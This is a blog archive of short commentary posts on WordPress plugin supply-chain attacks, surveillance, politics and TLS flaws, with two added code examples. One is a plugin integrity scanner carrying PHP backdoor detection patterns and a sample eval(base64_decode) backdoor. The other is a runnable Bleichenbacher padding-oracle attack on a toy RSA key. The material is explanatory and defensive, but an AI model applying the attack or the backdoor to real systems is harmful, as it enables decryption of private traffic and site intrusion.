
WordPress Supply Chain Attacks

Per Wordfence, there are four reasons that supply-chain (i.e., plugin-based) attacks on WordPress installations are attractive to attackers:

The first reason is simply scale. According to w3techs, WordPress powers 29.2% of all websites – a massive user base to go after. In addition, at the time of this writing there were 53,566 plugins available for download in the official WordPress.org plugin repository. That is a lot to work with on both fronts.

Secondly, the WordPress.org plugin directory is an open, community-driven resource. According to the plugin guidelines page, “It is the sole responsibility of plugin developers to ensure all files within their plugins comply with the guidelines.” This means that while there is a small team tasked with managing the plugin repository and another small team focused on security, ultimately users rely on plugin developers to keep them safe.

Thirdly, most WordPress sites are managed pretty casually. Making a change to a website at a larger company might include code review, testing and a formal change control process. But that’s probably not happening consistently, if at all, on most smaller websites. In addition, many site owners don’t monitor their WordPress sites closely, which means malware can often remain in place for many months without being discovered.

Lastly, the WordPress plugin repository has a huge number of abandoned plugins. When we looked back in May, almost half of the available plugins hadn’t been updated in over two years. This represents a great opportunity for ne’er-do-wells looking to con unsuspecting plugin authors into selling something they created years ago and have moved on from.

The aforementioned points outline why acquiring and infecting WordPress plugins is a reasonable way of penetrating WordPress installs. However, I think that Wordfence is missing the most important reason that such attacks succeed: few actual users of WordPress are technically competent to monitor what, exactly, their plugins are doing. Nor are shared hosting services particularly good at identifying when a technically illiterate user’s site is compromised, alerting the site owner, and telling them what they need to do to remediate the intrusion.

Trying to get individual users to more carefully monitor how their plugins work is a fool’s errand. What’s needed is for hosts to provide a community service: not just actively identifying hijacked plugins (and sites) but also providing meaningful remediation processes. User education and alerts aren’t enough (or even moderately sufficient): companies must guide site owners through the process of cleaning their sites. Otherwise malware campaigns aimed at WordPress will persist and grow over time.
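What a host-side check could look like, as an added example that is not Wordfence’s code and not part of the original post: a Python script that baselines the SHA-256 of every file under a plugin directory, reports files added, removed or changed since the baseline, and runs the new or changed files past a handful of obfuscation idioms that legitimate plugins rarely need. The plugin tree, the “hijacked update” and the pattern list are constructed for the demonstration; in practice the baseline would be taken from the copy the host installed (or from the WordPress.org release archive), and every pattern hit still needs a human to read the file.

```python
"""Host-side plugin integrity check: baseline file hashes, report drift,
and triage changed files for obfuscation idioms. Added example; the plugin
tree, the 'hijacked update' and the pattern list are all constructed."""
import hashlib
import json
import os
import re
import tempfile

# Constructed triage patterns: idioms legitimate plugins rarely need. A hit
# is a reason to read the file, not proof that it is malicious.
SUSPICIOUS = [
    ("eval-of-decoder",
     re.compile(rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("create_function", re.compile(rb"\bcreate_function\s*\(", re.I)),
    ("preg_replace-e-modifier",
     re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e['\"]", re.I)),
    ("request-to-callback",
     re.compile(rb"(?:call_user_func(?:_array)?|array_map)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)", re.I)),
    ("long-base64-blob", re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")),
]


def hash_tree(root: str) -> dict:
    """Map every file under root (relative path) to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Files added, removed or modified since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline.keys() & current.keys()
                          if baseline[p] != current[p]),
    }


def scan_file(path: str) -> list:
    """Names of the triage patterns that match the file's contents."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [name for name, rx in SUSPICIOUS if rx.search(data)]


def audit(root: str, baseline: dict) -> dict:
    """Diff the tree against the baseline and triage anything new or changed."""
    report = diff_manifests(baseline, hash_tree(root))
    report["flagged"] = {}
    for rel in report["added"] + report["changed"]:
        hits = scan_file(os.path.join(root, rel))
        if hits:
            report["flagged"][rel] = hits
    return report


def demo() -> dict:
    """Constructed plugin: baseline it, then simulate a hijacked 'update'."""
    with tempfile.TemporaryDirectory() as root:
        plugin = os.path.join(root, "example-plugin")
        os.makedirs(plugin)
        main_file = os.path.join(plugin, "example-plugin.php")
        with open(main_file, "w") as fh:
            fh.write("<?php\n/* Plugin Name: Example */\nadd_action('init', 'ex_init');\n")
        baseline = hash_tree(root)
        # The new owner's release: a backdoor appended to the main file and a
        # dropped helper with an innocuous-looking name.
        with open(main_file, "a") as fh:
            fh.write("eval(base64_decode($_POST['x']));\n")
        with open(os.path.join(plugin, "class-wp-cache.php"), "w") as fh:
            fh.write("<?php $f = create_function('', 'return 1;');\n")
        return audit(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The hash diff is the part that scales: it catches a backdoor that uses no recognisable idiom at all, because the plugin’s files simply are not the ones the host installed. The pattern list only ranks which of the changed files to read first.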


Photographic Rules and Human Physiology

Ming Thein:

We’ve touched on the cliches, we’ve touched on the physiology (much more detail in this and this article) but we haven’t touched on some things that generally make sense; I use the term ‘generally’ because as always there are exceptions dependent on the subject, scene and communicative intent of the photographer. Whilst for instance hard shadows usually make for interesting architectural images, they aren’t always so good for senior portraits or product photography. But this can be simplified into a logical statement like “shadows can assist with spatial orientation of a composition, and enhancing texture” – which I think is legitimate. But ultimately, the photographer has to decide if they actually want an obvious spatial orientation or not – they may not, for instance, if the intention is to make an extremely abstract composition. The example images given deliberately violate at least one, sometimes more, of the commonly bandied photographic rules – yet to my eyes at least, they still work.

I hadn’t really considered how the human body helps to dictate or guide the ‘rules’ of photography. While Ming Thein’s discussion is brief, it’s perhaps useful for opening up new ways of thinking about the photos that we choose to take, and how deliberate shots vary from snapshots.


A Deep Dive Into Russian Surveillance In The Silicon Valley Area

Via Foreign Policy:

This focus on signals and technical intelligence persisted until much more recently, multiple former U.S. intelligence officials told me. “It was almost like everyone they had there was a technical guy, as opposed to a human-intelligence guy,” one former official recalled. “The way they protected those people — they were rarely out in the community. It was work, home, work, home. When they’d go out and about, to play hockey or to drink, they’d be in a group. It was hard to penetrate.” The same official also noted that San Francisco was integral to the discovery by U.S. intelligence of a new class of Russian “technical-type” intelligence officer, working for the rough Russian equivalent of the National Security Agency, before this organization was eventually folded by Putin back into the FSB. This group, which was not based at the consulate itself, was identified via its members’ travel patterns — they would visit the Bay Area frequently — and the types of individuals, all in high-tech development, with whom they sought contact. According to this former U.S. official, these Russian intelligence officers were particularly interested in discussing cryptology and the Next Generation Internet program.

But it was the consulate’s location — perched high atop that hill in Pacific Heights, with a direct line of sight out to the ocean — that likely determined the concentration of signals activity. Certain types of highly encrypted communications cannot be transmitted over long distances, and multiple sources told me that U.S. officials believed that Russian intelligence potentially took advantage of the consulate’s location to communicate with submarines, trawlers, or listening posts located in international waters off the Northern California coast. (Russian intelligence officers may also have been remotely transmitting data to spy stations offshore, multiple former intelligence officials told me, explaining the odd behaviors on Stinson Beach.) It is also “very possible,” said one former intelligence official, that the Russians were using the San Francisco consulate to monitor the movements, and perhaps communications, of the dozen or so U.S. nuclear-armed submarines that routinely patrol the Pacific from their base in Washington state.

All in all, said this same official, it was “very likely” that the consulate functioned for Russia as a classified communications hub for the entire western United States — and, perhaps, the entire western part of the hemisphere.

There is a lot to this very long-form piece, including descriptions of Russian intelligence operations and communications patterns, how lawful Russian overflights of American territory might be used for a variety of intelligence purposes, and the Trump administration’s likely cluelessness about why closing the Russian consulate in San Francisco was so significant. But most interesting, for me, was how the consulate likely functioned as an outpost for Russian signals intelligence operations, both because of the depth of analysis in the article and because of what it tells us about how Western-allied consulates and diplomatic facilities are likely used.1 In effect, the concerns raised by former FBI and other American counter-intelligence officers speak to how America and her allies may conduct their own forms of surveillance.

  1. In a provincial sense, the concerns and opinions espoused by American counter-intelligence officers also raise questions about the role of Canada’s significant number of diplomatic facilities scattered throughout China and other regions where the United States is more challenged in building out State Department facilities.

The Dangers of Policy Learning

Via the New York Times:

Seizing on immigration as the cause of countless social and economic problems, Mr. Trump entered office with an agenda of symbolic but incompletely thought-out goals, the product not of rigorous policy debate but of emotionally charged personal interactions and an instinct for tapping into the nativist views of white working-class Americans.

Donald Trump isn’t so much tapping into ‘nativist’ views as, instead, exploiting citizens’ unawareness of the benefits of both immigration and trade. Immigrants contribute to the tax base, take less time off, and their direct descendants also contribute more to the tax base than ‘long-term’ citizens. Immigration is a net gain for ‘regular’ American workers but they haven’t been told just how, and why, their own lives and the social benefits they draw on are significantly improved by immigration into America.

Even as the administration was engaged in a court battle over the travel ban, it began to turn its attention to another way of tightening the border — by limiting the number of refugees admitted each year to the United States. And if there was one “deep state” stronghold of Obama holdovers that Mr. Trump and his allies suspected of undermining them on immigration, it was the State Department, which administers the refugee program.

The State Department is a core centre of American soft power; its programs, educational efforts, international outreach, and more are responsible for spreading American values around the world.1 That the administration is hollowing out the department is the truest evidence that it is unaware of how, and why, America has managed to maintain its position in the world. While American military might is significantly responsible for the development and maintenance of its imperial stature, that stature is solidified and extended through the adoption of American values. Such values are more than those associated with the military; they’re the ones spread by staff from State who promote American values in formal diplomatic efforts, as well as through the range of other activities undertaken by consular and embassy staff throughout the world.

It is incredibly hard to believe that the Trump administration is barely one year into a four-year term. Given the lasting damage the administration has already done to America’s ability to project power around the world, it’s hard to imagine just what America’s stature will be in a few more years. But what’s most significant is that his administration has learned so quickly how to deliberately hollow out institutions which have long been hallowed to Americans. This kind of learning suggests that the administration might succeed on more of its outrageous campaign promises, promises which are being supported by the House and Senate, and is thus indicative of a broader set of values (or lack thereof) held by many American politicians.

  1. In the interests of disclosure: I will personally be enrolled in the State Department’s International Visitor Leadership Program in the coming fall.

The Roundup for December 16-22, 2017 Edition

Picture of an illuminated maple leaf
Canadian Heart by Christopher Parsons 

My less-busy times this week were spent writing out notes, cards, emails, and other correspondence to some of the most important people in my life. It’s been a challenging year; the world seems to be falling apart due to changes in American politics, deaths and illnesses by family and friends have been hard to take, and the tempo for high-quality professional work never really slows down. And so I took some time writing to the people I’ve most closely worked with, supported, or been supported by to thank them for just being present and active in my life.

I find writing these sorts of messages of thanks, encouragement, and praise challenging. They’re not the kind of thing that I have ever really received much of throughout my personal or professional life; it’s just not normal in my family to communicate our deep feelings for one another, and in academe the point is to move to the next project (and subject it to critique) instead of dwelling on past projects and receiving accolades for them. But as challenging as I find writing these messages they have a profound personal impact: by pulling together my thoughts and writing them down and sending them, I’m humbled by realizing just how blessed I am to be surrounded by the kind, funny, supporting, and amazing people in my life.

There used to be a time when a lot more holiday cards, notes, and messages were sent back and forth between people this time of year. And many people still send cards, but don’t take the time — five, ten, or even twenty minutes — to handwrite a real thought to whomever the recipient happens to be. But those are the cards and notes and emails that people carry with them for years, packing them carefully away as they move from one physical or digital home to another. They don’t cost a lot of money to produce, and in the case of email are almost entirely free, but they show that you’ve spent time thinking about a specific person. And that time, in and of itself, is indicative of someone’s importance in your life.

So before you go out and spend money on another present, consider taking that time and, instead, writing a letter or note to whomever the recipient is. Chances are good that they’ll remember and treasure the message you left with them for longer than any material possession you might give them.


Some of the bigger news in the Apple world this week has focused on how Apple treats older iPhones whose batteries have degraded. While most of the reporting is focused on the slowdowns experienced by iPhone 6 and 6s devices, which Apple introduced in iOS 10.2.1, the same behaviour was extended to the iPhone 7 in iOS 11.2, so those devices also exhibit the slowdowns as their batteries degrade.

I’m of two minds on this. I see this as an effort by Apple to avoid having to replace batteries on older (but not THAT old) devices, but in a sneaky way: the company’s lack of transparency makes it appear that Apple is trying to pull a fast one on consumers. This is especially the case for consumers who’ve purchased AppleCare; if their devices are suffering known problems, then Apple should at minimum be proactively notifying owners to bring the devices in for servicing, and that doesn’t seem to have been the case.

So, on the one hand, this is Apple being sneaky.

But on the other it’s a semi-elegant engineering problem to resolve a hard-to-fix problem. We use our smartphones with such regularity and subject them (and, in particular, their batteries) to such exceptional abuse that degradation has to happen. And so I think that Apple stuffing processors into devices (at least in the current and last generation) that are excessive for daily use means the slowdowns are less problematic for most users. They might think that their devices are a bit slower but, generally, still be able to use them for about as long as they used to use them. And that length of use is what most people measure ‘battery life’ by so…maybe Apple is dealing with the problem the way users would actually prefer.

That Apple doesn’t change out batteries when they’re worn down, however, emphasizes that it’s a pretty good idea to resell your devices every year or so in order to get the best return for them as well as in order to enjoy the best performance from your iPhone. And I guess, as a byproduct, if you’re buying a second-hand iPhone you should definitely do a battery test before handing over your cash.


Inspiring Quotation

“Giving is about more than donating money. It’s about sharing your capabilities, content, and connections—and above all, giving others the chance to be heard, respected, and valued.”

– Adam Grant

Great Photography Shots

I’m absolutely blown away by the award winning photos for the 2017 Siena International Photo Awards.

Music I’m Digging

Neat Podcast Episodes

Good Reads for the Week

Cool Products


In western China, thought police instill fear

From the Associated Press:

Southern Xinjiang, where Korla is located, is one of the most heavily policed places on earth.

In Hotan, police depots with flashing lights and foot patrols are set up every 500 meters. Motorcades of more than 40 armored vehicles rumble down city boulevards. Police checkpoints on every other block stop cars to check identification and smartphones for religious content.

Xinjiang’s published budget data shows public security spending this year is on track to increase 50 percent from 2016 to roughly 45 billion yuan ($6.8 billion) after rising 40 percent a year ago. It’s quadrupled since 2009, when a Uighur riot broke out in Urumqi, killing nearly 200 people.

But much of the policing goes unseen.

Shoppers entering the Hotan bazaar must pass through metal detectors and place their national identification cards on a reader while having their faces scanned. AP reporters were stopped outside a hotel by a police officer who said the public security bureau had been remotely tracking the reporters’ movements by watching surveillance camera footage.

The government’s tracking efforts have extended to vehicles, genes and even voices. A biometric data collection program appears to have been formalized last year under “Document No. 44,” a regional public security directive to “comprehensively collect three-dimensional portraits, voiceprints, DNA and fingerprints.” The document’s full text remains secret, but the AP found at least three contracts referring to the 2016 directive in recent purchase orders for equipment such as microphones and voice analyzers.

The extent of the technical and human surveillance, and the punishments that are meted out for failing to adequately monitor family members and friends, is horrifying.1 And while the surveillance undertaken in this area of China is particularly severe, the kind of monitoring that occurs throughout the country is more extensive and ever-present than many people who haven’t travelled into China can appreciate. The Chinese surveillance infrastructure is the kind of apparatus that exists to sustain itself, first and foremost, by ensuring that contrary ideologies and philosophies are threatened and, where possible, rendered impotent by way of threats and fear.

  1. While much of the contemporary surveillance is now provided by Chinese-based companies it’s worth remembering that, historically, this equipment was sold by Western companies.

19-Year-Old Vulnerability Continues to Haunt the Internet

Via Ars Technica:

A surprisingly big number of top-name websites—Facebook and PayPal among them—recently tested positive for a critical, 19-year-old vulnerability that allowed attackers to decrypt encrypted data and sign communications using the sites’ secret encryption key.

The vulnerability in the transport layer security protocol for Web encryption was disclosed in 1998 when researcher Daniel Bleichenbacher found it in the TLS predecessor known as secure sockets layer. A flaw in the algorithm that handles RSA encryption keys responded to certain types of errors in a way that divulged potentially sensitive information. With enough specially formed queries, attackers could exploit the weakness in a way that allowed them to decrypt ciphertext even when they didn’t have the secret decryption key. SSL architects responded by designing workarounds that suppressed the error messages rather than removing or rewriting the faulty RSA algorithm.

The vulnerability of Cisco’s ACE is concerning, because Cisco stopped supporting it several years ago and the researchers said the company has no plans to patch the product line. Even worse, it’s not possible to disable RSA encryption in the product, leaving users unable to follow one of the few possible workarounds for those unable to patch. What’s more, the researchers said Cisco is currently using ACE to serve content on cisco.com.

Companies that are responsible for providing critical infrastructure technologies need to be accountable for what they develop and sell. Imagine if a car company with a known-deficient vehicle refused to fix or repair it on the basis that they didn’t support it any longer: there’d be class action suits almost immediately. The technology sector needs to mature, and fast. (For what it’s worth, the workaround the researchers have in mind is disabling the RSA key-exchange cipher suites in favour of the (EC)DHE ones; a device that cannot do that and will never be patched has no safe configuration.)

But as an aside, these are the sorts of weaknesses and vulnerabilities that the NSA and other national security agencies, along with private signals intelligence vendors, actively exploit. The actual ways in which cryptography is implemented are often rife with issues. One has to ask not only why Cisco’s and other major companies’ products were vulnerable in the first place, but also whether the NSA or its sister agencies knew about the weaknesses and have been exploiting them instead of trying to better secure the public’s communications.

In theory the United States government, as well as the Canadian government, has a Vulnerabilities Equities Process (VEP). If this vulnerability was discovered but not disclosed, it would be a damning indictment of the adequacy of the current VEP protocols.
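The mechanism Ars describes above, as an added example that is not part of the original post and not the code of any product named in it: a toy RSA key (constructed from two Mersenne primes and far too small to be secure), a server-side PKCS#1 v1.5 check that leaks whether a decrypted block begins with 0x00 0x02, and Bleichenbacher’s 1998 interval-narrowing attack run against that leak. The attacker never sees the private key; it only multiplies the target ciphertext by chosen values s^e mod n, which RSA’s malleability turns into questions about m·s, and asks the oracle. The key, the one-byte message and the lenient two-byte check are all assumptions made for the demonstration.

```python
"""Toy Bleichenbacher (1998) padding-oracle attack on RSA PKCS#1 v1.5.
Added example; the key, message and oracle below are all constructed."""

# Constructed toy key from two Mersenne primes: ~92-bit modulus, k = 12 bytes.
# Hopelessly insecure on purpose so the attack finishes in seconds.
P, Q = (1 << 61) - 1, (1 << 31) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8      # modulus length in bytes
B = 1 << (8 * (K - 2))             # a conforming plaintext m satisfies 2B <= m < 3B


def pkcs1_v15_pad(msg: bytes) -> int:
    """00 02 <PS: at least 8 non-zero bytes> 00 <msg>; PS is fixed for determinism."""
    ps_len = K - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long for this modulus")
    return int.from_bytes(b"\x00\x02" + b"\xa5" * ps_len + b"\x00" + msg, "big")


def unpad(m: int) -> bytes:
    block = m.to_bytes(K, "big")
    if block[:2] != b"\x00\x02":
        raise ValueError("bad padding")
    return block[block.index(b"\x00", 2) + 1:]


def encrypt(m: int) -> int:
    return pow(m, E, N)


def padding_oracle(c: int) -> bool:
    """Leaky server: reveals whether the decrypted block starts with 00 02.
    A stack that distinguishes this case from other errors (by alert type,
    timing or behaviour) hands the attacker exactly this one bit."""
    return pow(c, D, N).to_bytes(K, "big")[:2] == b"\x00\x02"


def _ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def bleichenbacher(c0: int, oracle, max_queries: int = 500_000):
    """Recover m from c0 = m^E mod N using only the oracle.
    Returns (m, number_of_oracle_queries)."""
    queries = 0

    def conforming(s: int) -> bool:
        nonlocal queries
        queries += 1
        if queries > max_queries:
            raise RuntimeError("oracle query budget exhausted")
        # RSA malleability: c0 * s^E mod N encrypts m*s, so the oracle answers
        # "is m*s mod N in [2B, 3B)?" without the attacker knowing m.
        return oracle((c0 * pow(s, E, N)) % N)

    intervals = [(2 * B, 3 * B - 1)]     # m is known to lie in here
    s = _ceil_div(N, 3 * B)              # step 2a: smallest s worth trying
    while not conforming(s):
        s += 1
    while True:
        # step 3: every conforming s narrows the candidate intervals
        new = set()
        for a, b in intervals:
            r_lo = _ceil_div(a * s - 3 * B + 1, N)
            r_hi = (b * s - 2 * B) // N
            for r in range(r_lo, r_hi + 1):
                lo = max(a, _ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.add((lo, hi))
        intervals = sorted(new)
        # step 4: a single interval collapsed to one point is the plaintext
        if len(intervals) == 1 and intervals[0][0] == intervals[0][1]:
            return intervals[0][0], queries
        if len(intervals) > 1:           # step 2b: linear search for the next s
            s += 1
            while not conforming(s):
                s += 1
        else:                            # step 2c: jump s using the interval
            a, b = intervals[0]
            r = _ceil_div(2 * (b * s - 2 * B), N)
            while True:
                s_lo = _ceil_div(2 * B + r * N, b)
                s_hi = (3 * B - 1 + r * N) // a
                hit = next((t for t in range(s_lo, s_hi + 1) if conforming(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1


def demo():
    """Encrypt a one-byte secret, then recover it through the oracle alone."""
    m = pkcs1_v15_pad(b"\x2a")
    recovered, n_queries = bleichenbacher(encrypt(m), padding_oracle)
    return unpad(recovered), n_queries


if __name__ == "__main__":
    secret, n_queries = demo()
    print(f"recovered {secret!r} after {n_queries} oracle queries")
```

Replacing `padding_oracle` with a check that answers identically for every malformed block (the “suppress the error messages” workaround the article mentions) starves the loop of information, and the 2017 findings are that many stacks still leak it through some side channel. The countermeasure that removes the oracle rather than hiding it is to turn off RSA key exchange, which is the one thing the quoted ACE product could not do.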


Security Planner by the Citizen Lab

From the Citizen Lab:1

Security Planner is an easy-to-use platform with tested, peer reviewed recommendations for staying safe online. With just a few clicks, Security Planner tailors straightforward recommendations based on someone’s digital habits and the technology they use. Recommendations are presented with clear language, making it easier to decide if they are right for someone. Our goal is to put people in a position to move from learning to action.

Our recommendations are developed by a peer review committee of experts from universities, nonprofits, and the private sector. The committee has decades of combined experience in digital security and produces recommendations that balance objectivity, accountability, and accessibility. This approach ensures that no private company can exercise influence over the products or services that we recommend. Security Planner is also overseen by an advisory board whose members include some of the world’s leading thinkers and practitioners in the digital security space.

Security Planner is a free tool that is designed to help everyone answer, and solve, their questions about online security. Check it out!

  1. In the interests of full disclosure, I’m an employee of the Citizen Lab though was only minimally involved in this particular project.

How Russia Polices Yandex

From Vice Motherboard:

This year, the “news aggregator law” came into effect in Russia. It requires websites that publish links to news stories with over one million daily users (Yandex.News has over six million daily users) to be responsible for all the content on their platform, which is an enormous responsibility.

“Our Yandex.News team has been actively working to retain a high quality service for our users following new regulations that impacted our service this past year,” Yandex told Motherboard in a statement, adding that to comply with new regulations, it reduced the number of sources that were aggregated from 7,000 to 1,000 with “official media licenses.”

The predictable result of the Russian government’s new law is that the government can better influence what information is surfaced to Russian citizens: when state news outlets release the same press release en masse, readers of Yandex1 and of other major aggregators are predominantly exposed to what the government wants them to see. So while Russia may interfere with foreign countries’ political processes by exploiting how social network and aggregator algorithms function (along with out-and-out illegal exfiltration and modification of communications data), it is trying to immunize itself against equivalent threats by way of the liabilities it places on the same kinds of companies when they do business in Russia.

More broadly, the experience in Russia and the changes in how Yandex operates should raise a warning flag for advocates in the Western world who are calling for social media companies to be (better) regulated, such as by striking down or modifying Section 230 of the Communications Decency Act (CDA). While there are clear dangers associated with these companies operating as contemporary digital sovereigns, there are also risks associated with imposing harsh liability regimes for publishing other persons’ content.

While such regulations might reduce some foreign interference in political systems, they could simultaneously diminish how often legitimate alternative sources of information are surfaced to the public. It remains unclear just how we should regulate the spread of malicious political messaging2 but, at the same time, it’s critical to ensure that any measures don’t have the detrimental effect of narrowing and diminishing the political conversations in which citizens can participate. It’s the very freedom to have such conversations that distinguishes free democratic countries from more autocratic ones.

  1. Sidenote: Yandex is the only website I’ve ever had to block from scraping my professional website because it was functionally acting as a DDoS.
  2. One idea would be to deliberately cut down on how easy it is to spread any and all information. By requiring additional manual effort to share content only the most motivated would share it. Requiring actual humans to share content with other humans, if done in a robust way, might cut down on the ability of bots to automatically propagate content as though ‘real’ people were sharing it.

Om Malik on the Blog Post Bribe Scandal

He writes:

The chase for cheap page views to arbitrage against advertising dollars is the real reason everyone at these mega page view factories willingly embraced this trend towards free content, which in turn left the whole experiment open to abuse. If you generate a lot of page views for these sites, you aren’t going away, because, in the end, it is all about page views.

On my other, professional, site I regularly receive requests from marketers to publish their content for some sort of payment. Many are outlandish in their requests whereas others have clearly done their homework and identified a range of posts the given brand wants to be associated with.

Some of the payment rates or product offerings are outlandish, others churlish, but none of them have ever overcome my baseline position: I own my professional web presence in order to build my reputation and brand. That brand is worth more than a few hundred or thousand dollars; it represents, at least in part, my ability to earn money over the span of the coming decades.

While there’s been some comic back and forth about charging marketers tens or hundreds of thousands of dollars to post other parties’ branded content, I think there is legitimately something to the idea. If you view your web presence as a long-term part of your career, and damaging that presence could potentially cost you in terms of future employment opportunities or consulting prospects, then that kind of valuation starts to make some sense.